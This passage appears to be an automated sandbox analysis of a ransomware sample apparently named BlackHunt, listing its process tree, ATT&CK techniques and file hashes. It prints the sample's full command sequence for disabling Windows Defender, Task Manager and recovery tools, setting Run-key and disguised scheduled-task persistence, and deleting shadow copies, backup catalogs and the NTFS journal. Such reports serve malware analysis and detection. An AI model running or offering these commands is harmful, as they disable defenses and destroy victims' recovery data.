C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1364
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1032
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2136
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2412
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1232
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe" /F2⤵PID:2036
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe" /F3⤵
- Creates scheduled task(s)
PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1484
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2192
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1292
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:732
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1896
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:368
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:484
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:736
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1656
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2272
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2628
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2872
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:484
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53ccfd57d3eaaea60d106837026ca78dd
SHA1b427d9a75440a232cb1d424dc7a8397f2b6f52f0
SHA256d9ce446281a2e9407d9b2969f70d97bb667048e41a859805a3d5956de185b8cb
SHA51273ce6471cb4952aae3f0000e2bc6d1630da7d5bb65c3de9a7c580d6c39e0961e783854213ace3981b10f08640f595de31a0fb3de073620499001399fa43e94b5
-
Filesize
12KB
MD5252877802126d1afe0cd119c05ec1f7d
SHA16f32e1ead40edb7d4d94328c26bb9fc8f4288856
SHA25601f1aee19ca5b5e20c387757c830d921283618da4a016553284083b9c7bf5149
SHA5128af95717c8d0644d5748a0610714e516669356c44acdd48e127e36ba8c8658b827f56e8cff9ea7cf1befb7017800d3a2347187916bdc5985613baf5c4a9830fb
-
Filesize
684B
MD5585ba05af01a8f736991370fb12f76f9
SHA161de9a0edf2ae27989ac949dea664515b9019abb
SHA256cef818c6084a4bf535c8b842059a46e1d9e2705eeab0bf953e1b9fe884806ddb
SHA512d6ca37e16e2bda54a66ef602e00c5a7f7699918e0eaaafd671e9ef6cce1ed289af9cc3ac050136139c451834b950d932c05b3e156e58841c0261af8c21aaef38